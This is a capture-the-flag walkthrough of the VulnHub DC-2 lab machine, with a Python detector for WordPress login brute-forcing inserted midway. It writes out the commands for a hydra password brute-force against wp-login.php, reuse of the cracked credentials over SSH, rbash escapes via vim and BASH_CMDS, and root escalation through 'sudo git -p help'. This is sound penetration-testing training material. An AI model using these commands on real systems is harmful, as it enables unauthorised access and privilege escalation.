DC-2

0x00 Preface

I've been slacking off for several days and it's time to get back to studying, so first I'm finishing DC-2, which I left unfinished earlier. Last time I got as far as the rbash part and got stuck; tonight I suddenly managed to escape it =.=, and after that it was smooth sailing all the way to root and the box was done.

0x01 Target introduction

Difficulty: easy (https://github.com/Ignitetechnologies/CTF-Difficulty)

Target page: https://www.vulnhub.com/entry/dc-2,311/

The description says you need to edit your hosts file so that the hostname dc-2 resolves to the VM's IP address.

(Remember to do this before starting; search Baidu for the method.)

This box also has 5 flags 👻

0x02 Information gathering

Port scanning is folded into this section as well.

First, find the target's IP:

    nmap -n -sn 192.168.189.0/24


Then scan the target's ports:

    nmap -sS -sV -O -p- 192.168.189.130


Consolidated port information:

    80/tcp   open  http    Apache httpd 2.4.10 ((Debian))
    7744/tcp open  ssh     OpenSSH 6.7p1 Debian 5+deb8u7 (protocol 2.0)

Only two ports, so let's start with the web port.

0x03 Getting a shell

The web home page holds flag1:

Your usual wordlists probably won’t work, so instead, maybe you just need to be cewl.

More passwords is always better, but sometimes you just can’t win them all.

Log in as one to see the next flag.

If you can’t find it, log in as another.

The hint points at using the cewl tool to build a password wordlist (Kali ships with it; the tool's description and usage are in the reference articles at the end):

    cewl http://dc-2 -w pass.txt
    # -w: save the generated wordlist to the file pass.txt

We can also see that the site is built on WordPress, so use wpscan to enumerate usernames directly (we already have the password list from above; what's missing is the usernames):

    wpscan --url dc-2 -e u


Put the three usernames wpscan found into a user list, then brute-force with hydra:

    hydra -L user.txt -P pass.txt dc-2 http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^:is incorrect'
    # Since this brute-forces a web form, there are a few more parameters than usual.
    # -L and -P need no explanation; dc-2 after them is the hostname, and http-form-post
    # means the target is an HTTP POST form.
    # The quoted string has three colon-separated fields: (1) the form's path,
    # (2) the POST body (^USER^ and ^PASS^ are placeholders and must not be changed),
    # (3) the text the page returns on a failed login.


hydra eventually reports valid credentials.
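A defender's-side counterpart to the hydra step above, added here as an example and not part of the original writeup: a small Python detector that flags any source address sending a burst of POST requests to /wp-login.php in an Apache combined access log, which is exactly the footprint a form brute-force leaves. The log lines are constructed; the threshold and window values are assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Apache combined log format; a form brute-force shows up as a burst of
# POST /wp-login.php requests from one source address.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"


def parse_line(line):
    """Return (ip, datetime, method, path, status), or None if the line does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), TS_FMT)
    return m.group("ip"), ts, m.group("method"), m.group("path"), int(m.group("status"))


def detect_login_bruteforce(lines, threshold=10, window_seconds=60):
    """Flag IPs that POST to /wp-login.php at least `threshold` times within any
    `window_seconds` interval (sliding window). Returns {ip: peak_count_in_window}."""
    events = defaultdict(deque)  # per-IP timestamps of login POSTs still inside the window
    flagged = {}
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ip, ts, method, path, _status = rec
        if method != "POST" or path.split("?")[0] != "/wp-login.php":
            continue
        q = events[ip]
        q.append(ts)
        while (ts - q[0]).total_seconds() > window_seconds:
            q.popleft()  # drop entries that fell out of the window
        if len(q) >= threshold:
            flagged[ip] = max(flagged.get(ip, 0), len(q))
    return flagged


# Constructed sample log (not captured from the DC-2 box): one noisy source, one normal visitor.
SAMPLE_LOG = [
    f'192.168.189.128 - - [12/Apr/2022:23:06:{s:02d} +0800] "POST /wp-login.php HTTP/1.1" 200 3254'
    for s in range(12)
] + [
    '192.168.189.1 - - [12/Apr/2022:23:06:05 +0800] "GET /index.php HTTP/1.1" 200 9812',
    '192.168.189.1 - - [12/Apr/2022:23:06:07 +0800] "POST /wp-login.php HTTP/1.1" 302 0',
]

if __name__ == "__main__":
    for ip, n in detect_login_bruteforce(SAMPLE_LOG).items():
        print(f"{ip}: {n} login POSTs within 60s")
```

Only the bursty address is reported; a single failed login from the normal visitor stays below the threshold.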

Logging in as jerry reveals flag2:

If you can't exploit WordPress and take a shortcut, there is another way.

Hope you found another entry point.

Next I dug through the admin backend but found nothing usable, so I tried the cracked credentials against SSH (there is still that SSH port).

It turns out tom's account can log in over SSH, which gives us a shell.


0x04 Privilege escalation

Once in, tom's shell turns out to be rbash, i.e. a restricted shell.


I found an article online (the rbash escape links in the references) and used the vi trick from it to escape:

    vim 1
    :set shell=/bin/bash
    :shell


You can see the error messages now come from bash. The bare cat command still isn't usable, so read flag3 with /bin/cat:


    Poor old Tom is always running after Jerry. Perhaps he should su for all the stress he causes.

(Of course, still under rbash, vi flag3.txt or less flag3.txt would also show the contents of flag3.)


BASH_CMDS can also be used to escape rbash:

    tom@DC-2:~$ BASH_CMDS[bilala]=/bin/sh
    tom@DC-2:~$ bilala
    $ /bin/cat flag3.txt
    Poor old Tom is always running after Jerry. Perhaps he should su for all the stress he causes.

After escaping (you could also export a proper PATH, but su is already usable here so that isn't needed), flag3's hint says to use su to switch users.

The credentials are the ones cracked earlier:

    /bin/su - jerry

flag4 is in jerry's home directory:

Good to see that you've made it this far - but you're not home yet. 

You still need to get the final flag (the only flag that really counts!!!).

No hints here - you're on your own now. :-)

Go on - git outta here!!!!

Run sudo -l to check jerry's sudo rights.


It shows that git is allowed; combined with flag4's hint, we can escalate through git:

    sudo git -p help
    !/bin/bash

With a root shell, flag5 is found in /root:

 __    __     _ _       _                    _ 
/ / /\ \ \___| | | __| | ___ _ __ ___ / \
\ \/ \/ / _ \ | | / _` |/ _ \| '_ \ / _ \/ /
\ /\ / __/ | | | (_| | (_) | | | | __/\_/
\/ \/ \___|_|_| \__,_|\___/|_| |_|\___\/


Congratulatons!!!

A special thanks to all those who sent me tweets
and provided me with feedback - it's all greatly
appreciated.

If you enjoyed this CTF, send me a tweet via @DCAU7.

(I couldn't find an article explaining why the git privilege escalation works; they all only tell you the steps ==)

0x05 References

cewl usage guide: https://www.freebuf.com/articles/network/190128.html

wpscan usage: https://xz.aliyun.com/t/2794

rbash escape: https://fireshellsecurity.team/restricted-linux-shell-escaping-techniques/

rbash escape: https://blog.csdn.net/qq_43168364/article/details/111830233

git privilege escalation: https://blog.csdn.net/G_Fu_Q/article/details/116276096
